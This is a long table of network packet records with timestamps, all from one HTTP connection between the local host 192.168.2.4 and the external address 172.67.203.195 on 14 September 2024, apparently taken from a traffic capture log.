Sep 14, 2024 18:31:08.901524067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901554108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901638031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901648998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901659012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901669025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901679039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901701927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901712894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901725054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901789904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901819944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901935101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901946068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901957035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902013063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902070999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902081966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902101040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902111053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902121067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902131081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902141094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902206898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902240992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902246952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902259111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902271032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902282000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902296066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902308941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902318954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902328014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902329922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902368069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902399063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902404070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902443886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902455091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902498960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902538061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902549028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902559042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902570963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902595043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902626991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902734995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902746916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902755976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902765989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902776957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902786970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902790070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902800083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902812004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902812004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902831078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902852058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902854919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902873993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902884960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902903080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902945042 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.902962923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902973890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902983904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.902993917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903023958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903057098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903086901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903105974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903115988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903126001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903166056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903196096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903197050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903297901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903307915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903320074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903330088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903341055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903352022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903351068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903383017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903423071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903563976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903611898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903623104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903637886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903670073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.903692961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903703928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903713942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.903851032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.944036961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944051981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944071054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944078922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944089890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944098949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944109917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944117069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.944350958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.944351912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.986948967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.986974001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.986985922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.986996889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987010002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987215996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.987258911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987273932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987286091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987293959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987303972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987313986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987323046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987332106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987349033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987359047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.987432957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.987433910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.987433910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.987433910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988149881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988168001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988209009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988240004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988276958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988287926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988296986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988333941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988336086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988343954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988372087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988380909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988384962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988419056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988424063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988436937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988437891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988456964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988477945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988513947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988522053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988527060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988585949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988600969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988610983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988619089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988662958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988667965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988677979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988687992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988729000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988734007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988739014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988786936 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988814116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988825083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988842010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988851070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988878965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988897085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988920927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.988924980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988936901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.988976955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989006996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989022970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989032984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989052057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989072084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989105940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989111900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989123106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989164114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989214897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989226103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989236116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989245892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989288092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989329100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989330053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989386082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989401102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989411116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989418983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989465952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989464998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989478111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989486933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989525080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989530087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989545107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989558935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989562988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989569902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989589930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989624977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989625931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989650965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989711046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989722967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989732981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989742994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989752054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989774942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989779949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989785910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989833117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989850998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989861012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989875078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.989909887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.989990950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990000010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990010023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990019083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990027905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990041971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990096092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990130901 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990133047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990144968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990154982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990187883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990231037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990291119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990319967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990329981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990338087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990375996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990377903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990387917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990400076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990410089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990417957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990420103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990463972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990474939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990530014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990540981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990550995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990560055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990605116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990647078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990657091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990664959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990675926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990684986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990715981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990721941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990757942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990758896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990771055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990814924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990823030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.990828037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.990864038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.031502008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031513929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031527996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031533957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031538010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031546116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031549931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.031555891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.032005072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.075376987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075401068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075412035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075431108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075442076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075455904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075469017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075478077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075488091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075504065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075512886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075524092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075534105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075540066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.075697899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.075783014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.075783968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076226950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076244116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076252937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076313019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076327085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076338053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076347113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076358080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076395988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076508045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076605082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076612949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076622963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076654911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076689005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076697111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076706886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076716900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076721907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076751947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076783895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076880932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076889992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076898098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076909065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076917887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076925993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076934099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076942921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076948881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.076951981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.076975107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077029943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077040911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077052116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077059984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077084064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077119112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077156067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077167034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077177048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077187061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077215910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077248096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.077358961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077368975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.077378035 CEST	80	49738	172.67.203.195	192.168.2.4
